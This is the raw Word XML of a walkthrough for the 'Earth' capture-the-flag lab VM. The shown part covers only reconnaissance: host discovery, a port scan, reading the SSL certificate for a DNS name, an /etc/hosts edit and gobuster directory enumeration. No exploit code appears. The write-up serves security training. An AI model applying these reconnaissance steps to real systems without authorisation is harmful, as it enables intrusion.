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7B52" w14:textId="64831CF0" w:rsidR="00D4406F" w:rsidRDefault="00531A62" w:rsidP="00BD68E2">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Walkthrough Earth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA03A0" w14:textId="618652EE" w:rsidR="00531A62" w:rsidRDefault="00531A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314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7C805" w14:textId="2B1634CE" w:rsidR="0004626A" w:rsidRDefault="0004626A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="257D4AAD" w14:textId="14B8CF3E" w:rsidR="007B1CD3" w:rsidRDefault="00680E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51288" w:history="1">
            <w:r w:rsidR="007B1CD3" w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Device Discovery</w:t>
            </w:r>
            <w:r w:rsidR="007B1CD3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007B1CD3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007B1CD3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145451288 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007B1CD3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007B1CD3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007B1CD3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="007B1CD3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52A6828C" w14:textId="2EE2199E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89" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service and Por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1B6F" w14:textId="2F31F762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0" w:history="1">
            <w:r w:rsidRPr="00B31CEE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64B7" w14:textId="35EE7DAA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1" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Directory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8FD4" w14:textId="72BDB455" w:rsidR="007B1CD3" w:rsidRDefault="007B1C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2" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>For the original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9F90" w14:textId="7DAB99D7" w:rsidR="007B1CD3" w:rsidRDefault="007B1C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3" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>For the DNS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5891" w14:textId="2C2C5AD0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4" w:history="1">
            <w:r w:rsidRPr="00B31CEE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72D0" w14:textId="7F726B94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5" w:history="1">
            <w:r w:rsidRPr="00B31CEE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81FC" w14:textId="207C2980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6" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Encoding Net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7405" w14:textId="16560304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7" w:history="1">
            <w:r w:rsidRPr="00B31CEE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A4A2" w14:textId="30C58EF6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8" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding Exploitable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92E5" w14:textId="6CE0BD66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299" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>L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64D" w14:textId="27860421" w:rsidR="007B1CD3" w:rsidRDefault="007B1CD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300" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Resetting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8C3B" w14:textId="5DF09719" w:rsidR="007B1CD3" w:rsidRDefault="007B1C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5451301" w:history="1">
            <w:r w:rsidRPr="00B31CEE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Root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21E4" w14:textId="24689F7B" w:rsidR="0004626A" w:rsidRDefault="00680EB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928503F" w14:textId="1A9B6E49" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="57E2A17D" w14:textId="2C5A1061" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="16331628" w14:textId="40E5C9DC" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="4A7DC1C8" w14:textId="557FECB9" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="27A95198" w14:textId="25AC0CA3" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="546D8994" w14:textId="0943CDBB" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="0938460B" w14:textId="4EE3D5EF" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="159305AC" w14:textId="444D54C7" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="65BA2018" w14:textId="306E35B3" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="0F0EECF8" w14:textId="4AA5B0DF" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="517F3F7D" w14:textId="19B38E81" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="6A037746" w14:textId="2203A2E8" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="008D5608" w14:textId="492A29C7" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="71918BF6" w14:textId="77B34B68" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="3460DC7A" w14:textId="456DEFBE" w:rsidR="006A3D1E" w:rsidRDefault="0004626A" w:rsidP="0004626A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc145451288"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Device Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="25932CFC" w14:textId="3B2485E4" w:rsidR="0004626A" w:rsidRDefault="0004626A">
      <w:r>
        <w:t xml:space="preserve">With the device connected to host only network, 192.168.56.0/24, we can use the netdiscover command to figure out what the </w:t>
      </w:r>
      <w:r w:rsidR="000B4A61">
        <w:t>Victims IP is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033151C6" w14:textId="429EC60F" w:rsidR="00013CFB" w:rsidRDefault="0088554F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AAAA516" wp14:editId="73681E0F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>176657</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2816225" cy="1969770"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21308"/>
                <wp:lineTo x="21478" y="21308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B9">
        <w:t xml:space="preserve">To discover the Kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008152B9">
        <w:t>Ip</w:t>
      </w:r>
      <w:r w:rsidR="006C3BAE">
        <w:t>P</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AA20FAB" w14:textId="6C1E3D42" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="30B41C8A" w14:textId="08B7A49E" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="0832E3A5" w14:textId="2353E4CB" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="647D0DE5" w14:textId="2C8AF557" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="69F2DAB4" w14:textId="24BD0BE6" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="037E4E99" w14:textId="1F9A0778" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="64D8634C" w14:textId="05B601C6" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="326EAB19" w14:textId="7B2F50D2" w:rsidR="00392B79" w:rsidRDefault="00392B79">
      <w:r>
        <w:t>Kali IP: 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C7605" w14:textId="64634DDB" w:rsidR="00A32628" w:rsidRDefault="00A30E8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C4EC745" wp14:editId="1046E518">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>210058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3457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0" y="20661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628">
        <w:t>Now we find the victims IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AED155" w14:textId="50AEC537" w:rsidR="002734D1" w:rsidRDefault="00A30E8A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B2457D1" wp14:editId="299AE92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154805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491" y="21023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70" cy="66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1EE67" w14:textId="4371BFA8" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="73ECAAFC" w14:textId="53ACB76D" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="2405A56B" w14:textId="4061FA98" w:rsidR="00C55B00" w:rsidRDefault="00C55B00">
      <w:r>
        <w:t>Victim: 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E65648" w14:textId="20C57812" w:rsidR="006A3D1E" w:rsidRDefault="0014157F" w:rsidP="00D678B3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc145451289"/>
      <w:r>
        <w:t>Service and Port Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="529C0B0D" w14:textId="5A2562A4" w:rsidR="0014157F" w:rsidRDefault="00925430">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67460CE3" wp14:editId="2C39D3FE">
            <wp:extent cx="5731510" cy="1474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5A76" w14:textId="60171487" w:rsidR="006A3D1E" w:rsidRDefault="00925430">
      <w:r>
        <w:t xml:space="preserve">We see that 3 ports are open and running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and web-server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B70A2" w14:textId="3BD8C08D" w:rsidR="00020FEE" w:rsidRDefault="00EA5CED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="055FAEA1" wp14:editId="2573CF82">
            <wp:extent cx="5731510" cy="1296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A3E" w14:textId="03454084" w:rsidR="006A3D1E" w:rsidRDefault="00EA5CED">
      <w:r>
        <w:t>The service information is mostly up to date, there is an unlikely possibility that OpenSSH can be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40310788" w14:textId="1C03CE88" w:rsidR="006A3D1E" w:rsidRDefault="00B026DF" w:rsidP="00E558DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc145451290"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Viewing Website</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="257F8602" w14:textId="31D5CAA1" w:rsidR="00B026DF" w:rsidRDefault="00187F47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="141A040F" wp14:editId="740E141E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>207188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4970780" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21533"/>
                <wp:lineTo x="21523" y="21533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610">
        <w:t xml:space="preserve">Navigating to the website </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00F96610" w:rsidRPr="002D049A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://192.168.56.101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F96610">
        <w:t xml:space="preserve"> greets with a default fedora test page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DC8EE" w14:textId="19B0E1DE" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="6177CECB" w14:textId="4C4523E7" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="137F2CD0" w14:textId="10E6DD84" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="03CCBC0A" w14:textId="6056901E" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="73E3A97C" w14:textId="7FE9EB09" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="4BEAB52D" w14:textId="06355166" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="4680658F" w14:textId="46C4FEEF" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="0E74E474" w14:textId="356CF083" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="2F53982C" w14:textId="3501ADDF" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="1C780E58" w14:textId="44CB00A3" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="3AE44FAC" w14:textId="63D146E2" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="6E993E4A" w14:textId="37CFD60F" w:rsidR="006A3D1E" w:rsidRDefault="00852419">
      <w:r>
        <w:t>Interesting that I cannot navigate to the http website, I get an error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B53C169" w14:textId="59CE28DE" w:rsidR="00BB0C94" w:rsidRDefault="00F07BAF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4219452A" wp14:editId="65F5466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01340" cy="1138555"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21323"/>
                <wp:lineTo x="21494" y="21323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6FE8" w14:textId="7F030251" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="3A30305E" w14:textId="65BC4BD4" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="0E0D77DE" w14:textId="73496B5E" w:rsidR="007B5F50" w:rsidRDefault="007B5F50"/>
    <w:p w14:paraId="4AC33044" w14:textId="331CF16F" w:rsidR="00BB0C94" w:rsidRDefault="00F520A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="703D3F7B" wp14:editId="1CA30D04">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>416967</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2871470" cy="3371850"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapTight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8F2">
        <w:t xml:space="preserve">If you notice in the top </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003438F2">
        <w:t>right hand</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003438F2">
        <w:t xml:space="preserve"> corner of the screen you can see an alert sign. Looking at this reveals the SSL certificate.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F520A5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7EA337" w14:textId="7E48654B" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="3A62F93D" w14:textId="020070E8" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="65F81C4A" w14:textId="7A6242EF" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="26AECBED" w14:textId="1AD21BBE" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="097EF6EF" w14:textId="66D3D70F" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="67EE490B" w14:textId="3B7508BB" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="13DCD0B1" w14:textId="193ED937" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="1B1FCE54" w14:textId="2E3B1A99" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="2C782E42" w14:textId="1993692E" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="4736BCF6" w14:textId="19FC0C80" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="74408CDA" w14:textId="6B687197" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="20DAAB5D" w14:textId="14EC1564" w:rsidR="00BB0C94" w:rsidRDefault="00F520A5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We have a DNS name, which is good. This is probably why we cannot connect to the HTTP version of the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A554575" w14:textId="27CD11CD" w:rsidR="00BB0C94" w:rsidRDefault="007444B1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6519A6C0" wp14:editId="190C1DD0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>190474</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="31623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70" y="20880"/>
                <wp:lineTo x="214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/etc/hosts file modify it with the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3DE033" w14:textId="62C48271" w:rsidR="007444B1" w:rsidRDefault="007444B1"/>
    <w:p w14:paraId="34F8389B" w14:textId="31A05F90" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="707ED533" w14:textId="057067EC" w:rsidR="00BB0C94" w:rsidRDefault="00796F79">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CFA2FC7" wp14:editId="444F84DD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>174421</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3686810" cy="2399030"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1270"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21440"/>
                <wp:lineTo x="21540" y="21440"/>
                <wp:lineTo x="215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50">
        <w:t>Now if I type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002F1350">
        <w:t>earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002F1350">
        <w:t>” the website should load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A665A" w14:textId="1064C89A" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="314A7DCB" w14:textId="15D8C280" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="5AD302AE" w14:textId="6C1AB715" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="57EE93B8" w14:textId="76A5D3AE" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="52B6B23F" w14:textId="45E0F46D" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="620DD5C2" w14:textId="47CE5D5A" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="52E0126C" w14:textId="77777777" w:rsidR="00BB0C94" w:rsidRDefault="00BB0C94"/>
    <w:p w14:paraId="4049B2A3" w14:textId="6656F313" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="30B81444" w14:textId="20EE51EB" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="6B1C9C13" w14:textId="77777777" w:rsidR="001C3628" w:rsidRDefault="001C3628" w:rsidP="001C3628">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc145451291"/>
      <w:r>
        <w:t>Directory Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7A469F35" w14:textId="5A79D2D7" w:rsidR="001C3628" w:rsidRPr="001C3628" w:rsidRDefault="001C3628" w:rsidP="001C3628">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc145451292"/>
      <w:r w:rsidRPr="001C3628">
        <w:t>For the original website:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="439C6616" w14:textId="214A7E70" w:rsidR="001C3628" w:rsidRDefault="001C3628" w:rsidP="001C3628">
      <w:r>
        <w:t>While using directory enumeration I was unable to find anything that was accessible. I was able to find “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/” however it gave me an error while trying to view it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E159B1" w14:textId="605DDE66" w:rsidR="001C3628" w:rsidRDefault="001C3628" w:rsidP="001C3628">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc145451293"/>
      <w:r>
        <w:t>For the DNS website:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0C29C899" w14:textId="340C7483" w:rsidR="001C3628" w:rsidRDefault="00043BDD" w:rsidP="001C3628">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E993E99" wp14:editId="5CDE983C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>519303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="49434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444">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FFC1B43" wp14:editId="602861E9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>176022</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="299085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20637"/>
                <wp:lineTo x="21538" y="20637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AE1">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D4AE1">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D4AE1">
        <w:t xml:space="preserve"> I will try and find a possible directory or file that I can view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C95658" w14:textId="7048CDCF" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="7D2C7596" w14:textId="7019645E" w:rsidR="006A3D1E" w:rsidRDefault="007C44CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="161B71E7" wp14:editId="0553626E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>694411</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>184785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4030345" cy="935990"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21102"/>
                <wp:lineTo x="21542" y="21102"/>
                <wp:lineTo x="215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78F4">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A778F4">
        <w:t xml:space="preserve"> found this directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA95669" w14:textId="39CF0B72" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="3BC96BDE" w14:textId="5B874971" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
